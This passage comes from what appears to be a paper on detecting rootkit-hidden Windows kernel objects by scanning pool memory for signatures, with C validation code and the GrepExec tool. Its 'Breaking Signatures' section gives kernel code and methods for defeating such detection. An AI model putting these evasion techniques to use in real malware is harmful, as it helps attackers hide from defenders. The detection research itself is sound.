||||
bReturn = TRUE;
|
||||
}
|
||||
|
||||
return bReturn;
|
||||
}
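
The same neighbor relationship can be exercised outside the kernel. The
sketch below is a user-mode simulation, not part of the accompanying tool: it
walks every block in a single 4096-byte buffer laid out like a page of 32-bit
pool blocks and checks that the PreviousSize and BlockSize chain is
consistent. All names are hypothetical, and put_pool_sizes exists only to
build test pages.

```c
#include <stddef.h>
#include <stdint.h>

#define SIM_PAGE_SIZE 4096u
#define POOL_UNIT     8u  /* 32-bit POOL_HEADER size and size-field unit */

static unsigned prev_size_at(const uint8_t *page, size_t off)
{
    return (unsigned)(page[off] | (page[off + 1] << 8)) & 0x1FF;
}

static unsigned block_size_at(const uint8_t *page, size_t off)
{
    return (unsigned)(page[off + 2] | (page[off + 3] << 8)) & 0x1FF;
}

/* Helper for building test pages: store PreviousSize and BlockSize (both in
   8-byte units) into the header at byte offset off. */
void put_pool_sizes(uint8_t *page, size_t off, unsigned prev, unsigned size)
{
    page[off]     = (uint8_t)(prev & 0xFF);
    page[off + 1] = (uint8_t)((page[off + 1] & 0xFE) | ((prev >> 8) & 1));
    page[off + 2] = (uint8_t)(size & 0xFF);
    page[off + 3] = (uint8_t)((page[off + 3] & 0xFE) | ((size >> 8) & 1));
}

/* Walk every block in one page. Returns the number of blocks if the chain of
   PreviousSize/BlockSize values is consistent and ends exactly at the page
   boundary, or -1 otherwise. */
int walk_pool_page(const uint8_t *page)
{
    size_t off = 0;
    unsigned expected_prev = 0;  /* first block in a page has PreviousSize 0 */
    int count = 0;

    while (off < SIM_PAGE_SIZE) {
        unsigned bs = block_size_at(page, off);
        if (bs == 0 || prev_size_at(page, off) != expected_prev)
            return -1;
        if (off + (size_t)bs * POOL_UNIT > SIM_PAGE_SIZE)
            return -1;
        expected_prev = bs;
        off += (size_t)bs * POOL_UNIT;
        count++;
    }
    return count;
}
```

Walking a whole page from its first header is stricter than checking one
block against its two neighbors, at the cost of touching more memory.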
|
||||
|
||||
|
||||
4.3) Object Specific Signatures
|
||||
|
||||
So far a few useful signatures have been shown which apply to all
|
||||
executive objects and could be used to identify them in memory. For some
|
||||
cases these may be enough to be effective. However, in other cases, it
|
||||
may be necessary to examine information within the object's body itself
|
||||
in order to identify them. It should be noted that some objects of
|
||||
interest may be clearly defined and documented while others may not be.
|
||||
Furthermore, executive object definitions may vary between OS versions.
|
||||
The following subsections briefly outline obvious memory signatures for
|
||||
a few objects which generally are of interest when identifying
|
||||
rootkit-like behavior. A few examples of object-specific signatures
|
||||
will also be discussed, some of which have been used in previous work.
|
||||
|
||||
4.3.1) Process Objects
|
||||
|
||||
Here are just a few of the most basic EPROCESS fields which can form a
|
||||
simple signature using rather predictable constant values which hold
|
||||
true for all EPROCESS structures in the same system.
|
||||
|
||||
-----------------------------+------------------------------------------
|
||||
Pcb.Header.Type | Dispatch header type number
|
||||
Pcb.Header.Size | Size of dispatcher object
|
||||
Pcb.Affinity | CPU affinity bit mask, typically one bit per CPU in system
|
||||
Pcb.BasePriority | Typically the default of 8
|
||||
Pcb.ThreadQuantum | Typically 18 on workstations
|
||||
ExitTime | 0 for running processes
|
||||
UniqueProcessId | Result is 0 when bitwise ANDed with 0xFFFF0002
|
||||
SectionBaseAddress | Typically 0x00400000 for non-system executables
|
||||
InheritedFromUniqueProcessId | Same test as UniqueProcessId, typically a valid running pid
|
||||
Session | Unique on a per-session basis
|
||||
ImageFileName | Printable ASCII, typically ending in '.exe'
|
||||
Peb | Result is 0x7FF00000 when bitwise ANDed with 0xFFF00FFF
|
||||
SubSystemVersion | XP Service Pack 2 is 0x400
|
||||
-----------------------------+------------------------------------------
|
||||
|
||||
Note that there are several other DISPATCH_HEADERs embedded within
|
||||
locks, events, timers, etc. in the structure which also have a predictable
|
||||
Header.Type and Header.Size.
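
A few of the value tests from the table above can be written directly as
predicates. This is a sketch with hypothetical function names, using the
masks given in the table and assuming the 16-byte ImageFileName field of XP
SP2. A real scanner would also need to allow for processes that have no PEB
at all, such as System.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>

/* Process and thread IDs: result must be 0 when ANDed with 0xFFFF0002. */
int plausible_client_id(uint32_t id)
{
    return (id & 0xFFFF0002u) == 0;
}

/* PEB/TEB address: result must be 0x7FF00000 when ANDed with 0xFFF00FFF. */
int plausible_peb(uint32_t peb)
{
    return (peb & 0xFFF00FFFu) == 0x7FF00000u;
}

/* ImageFileName: a 16-byte field holding a non-empty printable ASCII name,
   NUL-terminated if shorter than the field. */
int plausible_image_name(const char *name)
{
    size_t n = 0;

    while (n < 16 && name[n] != '\0') {
        if (!isprint((unsigned char)name[n]))
            return 0;
        n++;
    }
    return n > 0;
}
```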
|
||||
|
||||
4.3.2) Thread Objects
|
||||
|
||||
Here are just a few of the most basic ETHREAD fields which can form a
|
||||
simple signature using rather predictable constant values which hold
|
||||
true for all ETHREAD structures in the same system.
|
||||
|
||||
|
||||
------------------+------------------------------------------------------
|
||||
Tcb.Header.Type | Dispatch header type number
|
||||
Tcb.Header.Size | Size of dispatcher object
|
||||
Teb | Result is 0x7FF00000 when bitwise ANDed with 0xFFF00FFF
|
||||
BasePriority | Typically the default of 8
|
||||
ServiceTable | nt!KeServiceDescriptorTable(Shadow) used by RAIDE
|
||||
Affinity | CPU affinity bit mask, typically one bit per CPU in system
|
||||
PreviousMode | 0 or 1, which is KernelMode or UserMode
|
||||
Cid.UniqueProcess | Result is 0 when bitwise ANDed with 0xFFFF0002
|
||||
Cid.UniqueThread | Result is 0 when bitwise ANDed with 0xFFFF0002
|
||||
------------------+------------------------------------------------------
|
||||
|
||||
Note that there are several other DISPATCH_HEADERs embedded within
|
||||
locks, events, timers, etc. in the structure which also have a predictable
|
||||
Header.Type and Header.Size.
|
||||
|
||||
|
||||
4.3.3) Driver Objects
|
||||
|
||||
A previously written tool named MODGREPPER by Joanna Rutkowska of
|
||||
invisiblethings.org used a signature based approach to detect hidden
|
||||
DRIVER_OBJECTs. This signature was later 'broken' by valerino, as described
|
||||
in a rootkit.com article titled "Please don't greap me!". Listed here
|
||||
are a few fields which a signature could be built upon to detect
|
||||
DRIVER_OBJECTs.
|
||||
|
||||
--------------+-----------------------------------------------------------
|
||||
Type | I/O Subsystem structure type ID, should be 4
|
||||
Size | Size of the structure, should be 0xa8 (168 decimal)
|
||||
DeviceObject | Pointer to a valid first created device object (can be NULL)
|
||||
DriverSection | Pointer to a nt!_LDR_DATA_TABLE_ENTRY structure
|
||||
DriverName | A UNICODE_STRING structure containing the driver name
|
||||
--------------+-----------------------------------------------------------
|
||||
|
||||
|
||||
The following fields of the DRIVER_OBJECT can be validated by assuring
|
||||
they fall within the range of a loaded driver image such that:
|
||||
|
||||
|
||||
DriverStart < FIELD < DriverStart + DriverSize.
|
||||
|
||||
|
||||
--------------------+----------------------------------------------------
|
||||
DriverInit | Address of DriverEntry() function
|
||||
DriverUnload | Address of DriverUnload() function, can be NULL
|
||||
MajorFunction[0x1c] | Dispatch handlers for IRP_MJ_XXX, can default to ntoskrnl.exe
|
||||
--------------------+----------------------------------------------------
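
The range test above can be sketched as follows. The function names and
parameters are hypothetical, addresses are held as 32-bit integers, and
MajorFunction entries are also accepted when they fall inside the kernel
image, since the table notes that they can default to ntoskrnl.exe.

```c
#include <stdint.h>

#define MAJOR_FUNCTION_COUNT 0x1c

/* Nonzero if start < addr < start + size, written so that it cannot
   overflow when the image sits near the top of the address space. */
int in_image(uint32_t addr, uint32_t start, uint32_t size)
{
    return addr > start && (addr - start) < size;
}

/* Validate the code pointers of a candidate DRIVER_OBJECT.
   drv_start/drv_size describe the driver image (DriverStart, DriverSize);
   krn_start/krn_size describe the ntoskrnl.exe image. */
int plausible_driver_pointers(uint32_t drv_start, uint32_t drv_size,
                              uint32_t krn_start, uint32_t krn_size,
                              uint32_t driver_init, uint32_t driver_unload,
                              const uint32_t *major_function)
{
    if (!in_image(driver_init, drv_start, drv_size))
        return 0;
    /* DriverUnload is optional and may be NULL. */
    if (driver_unload != 0 && !in_image(driver_unload, drv_start, drv_size))
        return 0;
    for (int i = 0; i < MAJOR_FUNCTION_COUNT; i++) {
        if (!in_image(major_function[i], drv_start, drv_size) &&
            !in_image(major_function[i], krn_start, krn_size))
            return 0;
    }
    return 1;
}
```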
|
||||
|
||||
|
||||
4.3.4) Device Objects
|
||||
|
||||
For the DEVICE_OBJECT structure there are few static
|
||||
signatures which are usable. Here are the only obvious ones.
|
||||
|
||||
|
||||
-------------+----------------------------------------------------------
|
||||
Type | I/O Subsystem structure type ID, should be 3
|
||||
Size | Size of the structure plus any device extension, at least 0xb8
|
||||
DriverObject | Pointer to a valid driver object
|
||||
-------------+----------------------------------------------------------
|
||||
|
||||
Note that the DriverObject field must be valid in order for the device
|
||||
to function.
|
||||
|
||||
4.3.5) Miscellaneous
|
||||
|
||||
So far the memory signatures discussed have been fairly straightforward
|
||||
and for the most part are simply a binary comparison with a specific
|
||||
value. Later in this paper, a technique called N-depth pointer
|
||||
validation will be discussed as a method of developing a more effective
|
||||
signature in situations where an attacker attempts to evade pointer-based
|
||||
memory signatures.
|
||||
|
||||
Another way of considering an object field as a signature is to validate
|
||||
it in terms of its characteristics instead of by its value. A common
|
||||
example of this would be to validate an object's LIST_ENTRY field.
|
||||
Validating a LIST_ENTRY structure can be done as follows:
|
||||
|
||||
|
||||
Entry == Entry->Flink->Blink == Entry->Blink->Flink.
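
Written out as a user-mode sketch, with a local stand-in for LIST_ENTRY and a
hypothetical function name, the check looks like this. In a kernel scanner
each of the Flink and Blink pointers would have to be validated as safe to
read before being dereferenced; that step is omitted here.

```c
#include <stddef.h>

/* Local stand-in for the kernel's LIST_ENTRY. */
struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
};

/* Entry == Entry->Flink->Blink == Entry->Blink->Flink */
int list_entry_is_consistent(const struct list_entry *entry)
{
    if (entry == NULL || entry->flink == NULL || entry->blink == NULL)
        return 0;
    return entry->flink->blink == entry && entry->blink->flink == entry;
}
```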
|
||||
|
||||
|
||||
A pointer to any object or memory allocation can also be checked using
|
||||
the function shown previously, named ValidatePoolBlock. Even a
|
||||
UNICODE_STRING.Buffer can be validated this way provided the allocation
|
||||
is less than PAGE_SIZE.
|
||||
|
||||
|
||||
5) Found An Object, Now What?
|
||||
|
||||
The question of what to do after potentially identifying an executive
|
||||
object through a signature depends on what the underlying goal is. For
|
||||
the purpose of the sample utility included with this paper, the goal
|
||||
may be to simply display some information about the objects as it finds
|
||||
them.
|
||||
|
||||
In the context of a rootkit detector, however, there may be many more
|
||||
steps that need to be taken. For example, consider a detector looking
|
||||
for EPROCESS blocks which have been unlinked from the process linked
|
||||
list or a driver module hidden from the system service API. In order to
|
||||
determine this, some cross-view comparisons of the raw objects detected
|
||||
and the output from an API call or a list enumeration are needed.
|
||||
Detectors must also take into consideration the race condition of an
|
||||
object being created or destroyed in between the memory enumeration and
|
||||
the acquisition of the "known to the system" data.
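
A cross-view comparison of this kind can be sketched as a set difference between the identifiers recovered by the memory scan and those reported by the system. The function and parameter names below are illustrative assumptions and are not taken from the sample utility.

```c
#include <stdbool.h>
#include <stddef.h>

/* True if id appears in list[0..n). A linear search keeps the sketch short. */
static bool id_in_list(unsigned long id, const unsigned long *list, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (list[i] == id)
            return true;
    return false;
}

/*
 * Collects identifiers seen by the memory scan but missing from the
 * system-reported view. Returns the number of such identifiers; at most
 * hidden_cap of them are stored in hidden[].
 */
static size_t cross_view_diff(const unsigned long *scanned, size_t n_scanned,
                              const unsigned long *reported, size_t n_reported,
                              unsigned long *hidden, size_t hidden_cap)
{
    size_t n_hidden = 0;

    for (size_t i = 0; i < n_scanned; i++) {
        if (id_in_list(scanned[i], reported, n_reported))
            continue;
        if (n_hidden < hidden_cap)
            hidden[n_hidden] = scanned[i];
        n_hidden++;
    }
    return n_hidden;
}
```

Because of the race condition described above, anything this returns is best treated as a candidate to re-check against a fresh snapshot rather than as proof of hiding.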
|
||||
|
||||
Additionally, it may be desirable to perform further sanity checks on
these objects beyond the signature itself. Do the object
|
||||
fields x,y,z contain valid pointers? Is field c equal to b? Does this
|
||||
object appear to be valid yet show signs of tampering in order to
|
||||
hide it? Does the number of detected objects match up with a global
|
||||
count value such as the one maintained in an OBJECT_TYPE structure? The
|
||||
following sections will briefly mention some random thoughts of what to
|
||||
do with a suspected object of the four types previously mentioned in
|
||||
this paper in Chapter 4.
|
||||
|
||||
|
||||
5.1) Process Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for EPROCESS
|
||||
objects.
|
||||
|
||||
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Compare against the EPROCESS->ActiveProcessLinks list.
|
||||
4. Does the process have a valid list of threads?
|
||||
5. Can PsLookupProcessByProcessId open its UniqueProcessId?
6. Is ImageFileName a valid string? zeroed? garbage?
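
The ImageFileName check in the list above could be approximated as follows. This is a sketch under assumptions: the field is treated as a fixed-size byte array copied out of the suspected EPROCESS, and "valid" is taken to mean a non-empty run of printable ASCII. The name_state_t type and classify_image_name function are hypothetical.

```c
#include <stddef.h>

typedef enum { NAME_VALID, NAME_ZEROED, NAME_GARBAGE } name_state_t;

/* Classifies a fixed-size name field as valid, zeroed, or garbage. */
static name_state_t classify_image_name(const unsigned char *name, size_t len)
{
    size_t i, nonzero = 0;

    for (i = 0; i < len; i++)
        if (name[i] != 0)
            nonzero++;
    if (nonzero == 0)
        return NAME_ZEROED;

    /* Walk the string up to its terminator or the end of the field. */
    for (i = 0; i < len && name[i] != 0; i++)
        if (name[i] < 0x20 || name[i] > 0x7e)
            return NAME_GARBAGE;

    /* An empty string followed by stray bytes is also suspicious. */
    return (i == 0) ? NAME_GARBAGE : NAME_VALID;
}
```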
|
||||
|
||||
5.2) Thread Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for ETHREAD
|
||||
objects.
|
||||
|
||||
1. Compare against a high level API such as kernel32!CreateToolhelp32Snapshot.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Does the thread have a valid owning process?
4. Can PsLookupThreadByThreadId open its Cid.UniqueThread?
5. What does Win32StartAddress point to? Is it a valid module address?
6. What is its ServiceTable value?
7. If it is in a wait state, for how long?
8. Where is its stack? What does its stack trace look like?
|
||||
|
||||
|
||||
5.3) Driver Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for DRIVER_OBJECT
|
||||
objects.
|
||||
|
||||
1. Compare against services found in the service control manager database.
|
||||
2. Compare against a system call such as nt!NtQuerySystemInformation.
|
||||
3. Is the object in the global system namespace?
|
||||
4. Does the driver own any valid device objects?
|
||||
5. Does the driver base address point to a valid MZ header?
6. Do the object's function pointer fields look correct?
7. Does DriverSection point to a valid nt!_LDR_DATA_TABLE_ENTRY?
8. Does DriverName or the LDR_DATA_TABLE_ENTRY have valid strings? zeroed? garbage?
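
As one example from the list above, the MZ header check might look like the following sketch. It operates on a buffer that is assumed to have already been copied safely from the driver's base address. It also goes one step beyond the MZ magic by following e_lfanew to the PE signature; that extra step is an addition for illustration and is not described in the paper. The function name is hypothetical.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define DOS_LFANEW_OFFSET 0x3c  /* offset of e_lfanew in IMAGE_DOS_HEADER */

/* Returns true if the buffer starts with "MZ" and e_lfanew leads to "PE\0\0". */
static bool looks_like_pe_image(const uint8_t *base, size_t len)
{
    uint32_t e_lfanew;

    if (len < DOS_LFANEW_OFFSET + 4)
        return false;
    if (base[0] != 'M' || base[1] != 'Z')
        return false;

    /* e_lfanew is a little-endian 32-bit offset to the NT headers. */
    e_lfanew = (uint32_t)base[DOS_LFANEW_OFFSET]
             | ((uint32_t)base[DOS_LFANEW_OFFSET + 1] << 8)
             | ((uint32_t)base[DOS_LFANEW_OFFSET + 2] << 16)
             | ((uint32_t)base[DOS_LFANEW_OFFSET + 3] << 24);

    /* Reject offsets that would place the signature outside the buffer. */
    if (e_lfanew > len || len - e_lfanew < 4)
        return false;

    return base[e_lfanew] == 'P' && base[e_lfanew + 1] == 'E'
        && base[e_lfanew + 2] == 0 && base[e_lfanew + 3] == 0;
}
```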
|
||||
|
||||
|
||||
5.4) Device Objects
|
||||
|
||||
Here is a brief list of things to check when scanning for DEVICE_OBJECT
|
||||
objects.
|
||||
|
||||
1. Is the owning driver object valid?
|
||||
2. Is the device named and is it mapped into the global namespace?
|
||||
3. Does it appear to be in a valid device stack?
|
||||
4. Are its Type and Size fields correct?
|
||||
|
||||
|
||||
6) Breaking Signatures
|
||||
|
||||
Memory signatures can be an effective method of identifying allocated
|
||||
objects and can serve as a low level baseline in order to detect objects
|
||||
hidden by several different methods. Although the memory signature
|
||||
detection method may be effective, it doesn't come without its own set
|
||||
of problems. Many signatures can be evaded using several different
|
||||
techniques and non-evadable signatures for objects, if any exist, have
|
||||
yet to be explored. The following sections discuss issues and
countermeasures related to defeating memory signatures.
|
||||
|
||||
|
||||
6.1) Pointer Based Signatures
|
||||
|
||||
A memory signature which is a valid pointer to some common object or
static data is very appealing to use for detection due to its
reliability; however, it is also an easy signature to bypass. The
|
||||
following demonstrates the most simplistic method of bypassing the
|
||||
OBJECT_HEADER->Type signature this paper uses as a generic object memory
|
||||
signature. This is possible because the OBJECT_TYPE is just an allocated
|
||||
structure of fairly stable data. Many pointer based signatures with
|
||||
similar static characteristics are open to the same attack.
|
||||
|
||||
|
||||
NTSTATUS KillObjectTypeSignature (
    IN PVOID Object
    )
{
    NTSTATUS       ntStatus = STATUS_SUCCESS;
    PVOID          pDummyObject;
    POBJECT_HEADER pHdr;

    pHdr = OBJECT_TO_OBJECT_HEADER( Object );

    // Allocate a private copy of the OBJECT_TYPE from non-paged pool
    pDummyObject = ExAllocatePool( NonPagedPool, sizeof(OBJECT_TYPE) );

    if( pDummyObject == NULL ) return STATUS_INSUFFICIENT_RESOURCES;

    RtlCopyMemory( pDummyObject, pHdr->Type, sizeof(OBJECT_TYPE) );

    // Point the header at the relocated copy so that a comparison
    // against the original OBJECT_TYPE address no longer matches
    pHdr->Type = pDummyObject;

    return ntStatus;
}
|
||||
|
||||
|
||||
6.2) N-Depth Pointer Validation
|
||||
|
||||
As demonstrated in the previous section, pointer based signatures are
|
||||
effective. However, in some cases, they may be trivial to bypass. The
|
||||
following code demonstrates an example which does what this paper refers
|
||||
to as N-depth pointer validation in an attempt to create a more complex,
|
||||
and potentially more difficult to bypass, signature using pointers. The
|
||||
following example is also evadable using the same principle of
|
||||
relocation shown above.
|
||||
|
||||
The algorithm assumes a given address is an executive object and
|
||||
attempts validation by performing the following steps:
|
||||
|
||||
1. Calculates an assumed OBJECT_HEADER
|
||||
2. Assumes pObjectHeader->Type is an OBJECT_TYPE
|
||||
3. Calculates an assumed OBJECT_HEADER for the OBJECT_TYPE
|
||||
4. Assumes pObjectHeader->Type is nt!ObpTypeObjectType
|
||||
5. Validates pTypeObject->TypeInfo.DeleteProcedure == nt!ObpDeleteObjectType
|
||||
|
||||
|
||||
BOOLEAN ValidateNDepthPtrSignature (
|
||||
IN PVOID Address,
|
||||
IN VALIDATE_ADDR pValidate
|
||||
)
|
||||
{
|
||||
PVOID pObject;
|
||||
POBJECT_TYPE pTypeObject;
|
||||
POBJECT_HEADER pHdr;
|
||||
|
||||
pHdr = OBJECT_TO_OBJECT_HEADER( Address );
|
||||
|
||||
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
|
||||
|
||||
// Assume this is the OBJECT_TYPE for this assumed object
|
||||
pTypeObject = pHdr->Type;
|
||||
|
||||
// OBJECT_TYPE's have headers too
|
||||
pHdr = OBJECT_TO_OBJECT_HEADER( pTypeObject );
|
||||
|
||||
if( ! pValidate(pHdr) || ! pValidate(&pHdr->Type) ) return FALSE;
|
||||
|
||||
// OBJECT_TYPE's have an OBJECT_TYPE of nt!ObpTypeObjectType
|
||||
pTypeObject = pHdr->Type;
|
||||
|
||||
if( ! pValidate(&pTypeObject->TypeInfo.DeleteProcedure) ) return FALSE;
|
||||
|
||||
// \ObjectTypes\Type has a DeleteProcedure of nt!ObpDeleteObjectType
|
||||
if( pTypeObject->TypeInfo.DeleteProcedure
|
||||
!= nt!ObpDeleteObjectType ) return FALSE;
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
|
||||
6.3) Miscellaneous
|
||||
|
||||
An obvious method of preventing detection from memory scanning would be
|
||||
to use what is commonly referred to as the Shadow Walker memory
|
||||
subversion technique. If virtual memory is unable to be read then of
|
||||
course a memory scan will skip over this area of memory. In the context
|
||||
of pool memory, however, this may not be an easy attack since it may
|
||||
create a situation where the pool appears corrupted which could lead to
|
||||
crashes or system bugchecks. Of course, attacking a function like
|
||||
nt!MmProbeAndLockPages or IoAllocateMdl globally or specifically in the
|
||||
import address table of the detector itself would work.
|
||||
|
||||
For memory signatures based on constant or predictable values it may be
|
||||
feasible to either zero out or change these fields and not disturb
|
||||
system operation. For example take the author's enhancements to the FUTo
|
||||
rootkit where it is seen that the EPROCESS->UniqueProcessId can be
|
||||
safely cleared to 0, or the previously mentioned rootkit.com article titled
|
||||
"Please don't greap me!" which clears DRIVER_OBJECT->DriverName and its
|
||||
associated buffer in order to defeat MODGREPPER.
|
||||
|
||||
For some pointer signatures, a simple binary comparison may not be
enough to validate them. Take the above example, which compares against
nt!ObpDeleteObjectType. This could be defeated by overwriting
pTypeObject->TypeInfo.DeleteProcedure to point to a simple jump
trampoline, allocated elsewhere, which simply jumps back to
nt!ObpDeleteObjectType.
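
One possible response to such a trampoline, offered here only as a sketch and not as something the paper implements, is for the detector to follow a leading direct jump before comparing addresses. The example assumes 32-bit x86, handles only the jmp rel32 (0xE9) and jmp rel8 (0xEB) encodings, and works on bytes that were already copied safely from the pointer's target. The resolve_jump name is hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * If code[] (located at virtual address addr) begins with a direct jump,
 * returns the jump destination; otherwise returns addr unchanged.
 */
static uint32_t resolve_jump(const uint8_t *code, size_t len, uint32_t addr)
{
    if (len >= 5 && code[0] == 0xE9) {          /* jmp rel32 */
        uint32_t rel = (uint32_t)code[1]
                     | ((uint32_t)code[2] << 8)
                     | ((uint32_t)code[3] << 16)
                     | ((uint32_t)code[4] << 24);
        return addr + 5 + rel;                  /* wraps modulo 2^32 */
    }
    if (len >= 2 && code[0] == 0xEB) {          /* jmp rel8, sign-extended */
        return addr + 2 + (uint32_t)(int32_t)(int8_t)code[1];
    }
    return addr;                                /* not a direct jump */
}
```

A trampoline built from other instructions, such as push / ret or an indirect jump, would not be caught by this, which shows how quickly the comparison becomes an arms race.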
|
||||
|
||||
|
||||
7) GrepExec: The Tool
|
||||
|
||||
Included with this paper is a proof-of-concept tool complete with source
|
||||
which demonstrates scanning the pool for signatures to detect executive
|
||||
objects. Objects detected are DRIVER_OBJECT, DEVICE_OBJECT, EPROCESS,
|
||||
and ETHREAD. The tool does nothing to determine whether an attempt has
been made to hide an object. Instead, it simply displays found
|
||||
objects to standard output. At this time the author has no plans to
|
||||
continue work with this specific tool, however, there are plans to
|
||||
integrate the memory scanning technique into another project. The source
|
||||
code for the tool can be easily modified to detect other signatures
|
||||
and/or other objects.
|
||||
|
||||
7.1) The Signature
|
||||
|
||||
For demonstration purposes the signature used is simple. All objects are
|
||||
allocated in NonPagedPool so only non-paged memory is enumerated for the
|
||||
search. The signature is detected as follows:
|
||||
|
||||
1. Enumeration is performed by assuming the start of a pool block.
|
||||
2. The signature offset is added to this pointer.
|
||||
3. The assumed signature is compared with the OBJECT_HEADER->Type
|
||||
for the object type being searched for.
|
||||
4. The assumed POOL_HEADER->PoolType is compared to the object's known
|
||||
pool type.
|
||||
5. The assumed POOL_HEADER is validated using the function shown
previously, ValidatePoolBlock.
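
Steps 1 through 3 can be illustrated with a user-mode sketch that walks a byte buffer standing in for a region of non-paged pool. The 8-byte block granularity, the callback type, and all names are assumptions made for the example. The pool header checks of steps 4 and 5 are left out.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BLOCK_GRANULARITY 8u  /* assumed alignment of x86 pool blocks */

/* Hypothetical callback invoked with the start of each matching block. */
typedef void (*found_block_cb)(const uint8_t *block, void *ctx);

/*
 * Treats every BLOCK_GRANULARITY-aligned offset in region[] as the start
 * of a pool block and compares the pointer-sized value at sig_offset with
 * signature. Returns the number of matches.
 */
static size_t scan_for_signature(const uint8_t *region, size_t region_len,
                                 size_t sig_offset, uintptr_t signature,
                                 found_block_cb cb, void *ctx)
{
    size_t hits = 0;

    for (size_t off = 0;
         off + sig_offset + sizeof(uintptr_t) <= region_len;
         off += BLOCK_GRANULARITY) {
        uintptr_t candidate;

        /* memcpy avoids unaligned reads when sig_offset is odd-sized. */
        memcpy(&candidate, region + off + sig_offset, sizeof candidate);
        if (candidate == signature) {
            hits++;
            if (cb != NULL)
                cb(region + off, ctx);
        }
    }
    return hits;
}
```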
|
||||
|
||||
|
||||
The following is the function which sets up the parameters in order to
|
||||
perform the pool enumeration and validation of a block by a single PVOID
|
||||
signature. On a match, a callback is made using the pointer to the start
|
||||
of the matching block. As an alternative to the PVOID signature, the
|
||||
poolgrep.c code can easily be modified to accept either a structure of
|
||||
several signatures and offsets or a validation function pointer in order
|
||||
to perform a more complex signature validation.
|
||||
|
||||
|
||||
NTSTATUS ScanPoolForExecutiveObjectByType (
|
||||
IN PVOID Object,
|
||||
IN FOUND_BLOCK_CB Callback,
|
||||
IN PVOID CallbackContext
|
||||
) {
|
||||
NTSTATUS ntStatus = STATUS_SUCCESS;
|
||||
POBJECT_HEADER pObjHdr;
|
||||
PPOOL_HEADER pPoolHdr;
|
||||
ULONG_PTR blockSigOffset;
|
||||
ULONG_PTR blockSignature;
|
||||
|
||||
pObjHdr = OBJECT_TO_OBJECT_HEADER( Object );
|
||||
pPoolHdr = OBJHDR_TO_POOL_HEADER( pObjHdr );
|
||||
blockSigOffset = (ULONG_PTR)&pObjHdr->Type - (ULONG_PTR)pObjHdr
|
||||
+ OBJHDR_TO_POOL_BLOCK_OFFSET(pObjHdr);
|
||||
blockSignature = (ULONG_PTR)pObjHdr->Type;
|
||||
|
||||
(VOID)ScanPoolForBlockBySignature( pPoolHdr->PoolType - 1,
|
||||
0, // pPoolHdr->PoolTag OPTIONAL,
|
||||
blockSigOffset,
|
||||
blockSignature,
|
||||
Callback,
|
||||
CallbackContext );
|
||||
return ntStatus;
|
||||
}
|
||||
|
||||
|
||||
7.2) Usage
|
||||
|
||||
GrepExec usage is pretty straightforward. Here is the output of the
|
||||
help command.
|
||||
|
||||
**********************************************************
|
||||
GREPEXEC 0.1 * Grepping executive objects from the pool *
|
||||
Author: bugcheck
|
||||
Built on: May 30 2006
|
||||
**********************************************************
|
||||
|
||||
Usage: grepexec.exe [options]
|
||||
|
||||
--help, -h Displays this information
|
||||
--install, -i Manually install driver
|
||||
--uninstall, -u Manually uninstall driver
|
||||
--status, -s Display installation status
|
||||
--process, -p GREP process objects
|
||||
--thread, -t GREP thread objects
|
||||
--driver, -d GREP driver objects
|
||||
--device, -e GREP device objects
|
||||
|
||||
|
||||
7.3) Sample Output
|
||||
|
||||
The standard output is also straightforward. Here is a sample of each
|
||||
supported command.
|
||||
|
||||
C:\grepexec>grepexec.exe -p
|
||||
EPROCESS=81736C88 CID=0354 NAME: svchost.exe
|
||||
EPROCESS=8174E238 CID=0634 NAME: explorer.exe
|
||||
EPROCESS=81792020 CID=027c NAME: winlogon.exe
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -t
|
||||
EPROCESS=817993C0 ETHREAD=815D4A58 CID=0778.077c wscntfy.exe
|
||||
EPROCESS=8174AA88 ETHREAD=815D6860 CID=0408.0678 svchost.exe
|
||||
EPROCESS=819CA830 ETHREAD=815F3B30 CID=0004.0368 System
|
||||
EPROCESS=81792020 ETHREAD=81600398 CID=027c.0460 winlogon.exe
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -d
|
||||
DRIVER=81722DA0 BASE=F9B5C000 \FileSystem\NetBIOS
|
||||
DRIVER=819A4B50 BASE=F983D000 \Driver\Ftdisk
|
||||
DRIVER=81725DA0 BASE=00000000 \Driver\Win32k
|
||||
DRIVER=81771880 BASE=F9EB4000 \Driver\Beep
|
||||
...
|
||||
|
||||
C:\grepexec>grepexec.exe -e
|
||||
DEVICE=81733860 \Driver\IpNat NAME: IPNAT
|
||||
DEVICE=81738958 \Driver\Tcpip NAME: Udp
|
||||
DEVICE=817394B8 \Driver\Tcpip NAME: RawIp
|
||||
DEVICE=81637CE0 \FileSystem\Srv NAME: LanmanServer
|
||||
...
|
||||
|
||||
|
||||
8) Conclusion
|
||||
|
||||
From reading this paper the reader should have a good understanding of
|
||||
the concepts and issues related to scanning memory for signatures in
|
||||
order to detect objects in the system pool. The reader should be able
|
||||
to enumerate system memory safely, construct their own customized memory
|
||||
signatures, locate signatures in memory, and implement their own
|
||||
reporting mechanism.
|
||||
|
||||
It is obvious that object detection using memory scanning is no exact
|
||||
science. However, it does provide a method which, for the most part,
|
||||
interacts with the system as little as possible. The
|
||||
author believes that the outlined technique can be successfully
|
||||
implemented to obtain acceptable results in detecting objects hidden by
|
||||
rootkits.
|
||||
|
||||
|
||||
Bibliography
|
||||
|
||||
Blackhat.com. RAIDE: Rootkit Analysis Identification Elimination.
|
||||
http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Silberman-Butler.pdf;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
F-Secure. Blacklight.
|
||||
http://www.f-secure.com/blacklight/;
|
||||
Accessed May. 30, 2006.
|
||||
|
||||
Invisiblethings.org. MODGREPPER.
|
||||
http://www.invisiblethings.org/tools.html;
|
||||
Accessed May. 30, 2006.
|
||||
|
